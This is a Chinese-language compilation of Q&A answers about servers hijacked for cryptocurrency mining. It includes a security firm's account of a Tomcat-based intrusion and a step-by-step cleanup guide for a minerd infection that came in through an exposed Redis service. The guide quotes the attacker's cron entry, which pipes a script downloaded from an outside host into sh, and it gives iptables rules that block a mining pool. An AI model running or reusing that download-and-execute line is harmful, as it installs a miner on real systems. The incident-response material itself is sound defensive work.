別人用伺服器挖礦
1. 伺服器 被人安裝上挖礦
比特幣 是吧
2. 伺服器被下挖礦了怎麼辦
哥們被下了啥挖礦?去舉報啊。之前流量礦石非常火的時候,我的伺服器也被無良黑了,成了肉雞,然後我去找到他的信息,截圖跟流量礦石舉報,就幫我處理了。你看你的被下了啥,就去找他們處理。
3. 為什麼黑客們要廣設伺服器,用別人的手機設備去挖礦
因為用別人的手機會更加安全一點,這樣公安局或者安全局就不容易找到黑客的地址了。
「偷礦」是指未經你同意的情況下,黑客利用你的系統資源挖掘虛擬貨幣。這主要藉助於網站的 JavaScript 代碼,黑客在代碼中注入「偷礦」程序,當你訪問這些代碼時,「偷礦」程序便會偷偷自動運行。
雖然 Chrome 是最常用的瀏覽器,但是 Opera 瀏覽器提供了一些 Chrome 沒有的有趣功能。最新版本的 Opera 瀏覽器能夠自動攔截廣告,此外,它還內置了阻止挖礦的防護功能。這一功能可以阻止網站擅自運行非法挖礦的腳本,這與網頁上的廣告攔截技術並沒有太大區別。
2.使用清理程序
如果採用了上面的措施之後你仍然放心不下,那麼可以在電腦和智能手機上安裝 Malwarebytes 清理程序,它的電腦版是完全免費的,但是針對手機的高級版是收費的。隨著現在越來越多的區塊鏈項目開始採用手機挖礦,如果你不想讓自己的手機有被當作肉雞的風險,適當花點小錢也是值得的。
你仍然可以繼續使用像卡巴斯基這樣的防病毒軟體來保護自己的智能手機。
4. 新人想用伺服器挖礦,是否可行
完全可以。
5. 求助伺服器被挖礦程序入侵,如何排查
新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接
伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般
會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這
就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客
戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。
挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,
仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查
當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。
對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病
毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,
客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊
狀況。
通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開
發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重
的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,
SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器
一切穩定運行,網站打開正常。
6. 伺服器好像被挖礦了,wnTKYg,怎麼弄
之前流量礦石非常火的時候,我的伺服器也被無良黑了,成了肉雞,然後我去找到他的信息,截圖跟流量礦石舉報,就幫我處理了。
7. 新人想用伺服器挖礦可以嗎
完全可以。
8. 朋友拉我租伺服器挖礦換取暗黑幣賺錢能做嗎
現在不好賺錢了,如果有經驗,防止封號,還有暗黑幣的渠道,是可以的。挖礦這個行情不好說,說不準漲或者跌,謹慎挖礦,理性賺錢。
9. 有人在聯通網路機房放伺服器挖礦要找什麼部門投訴
10. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.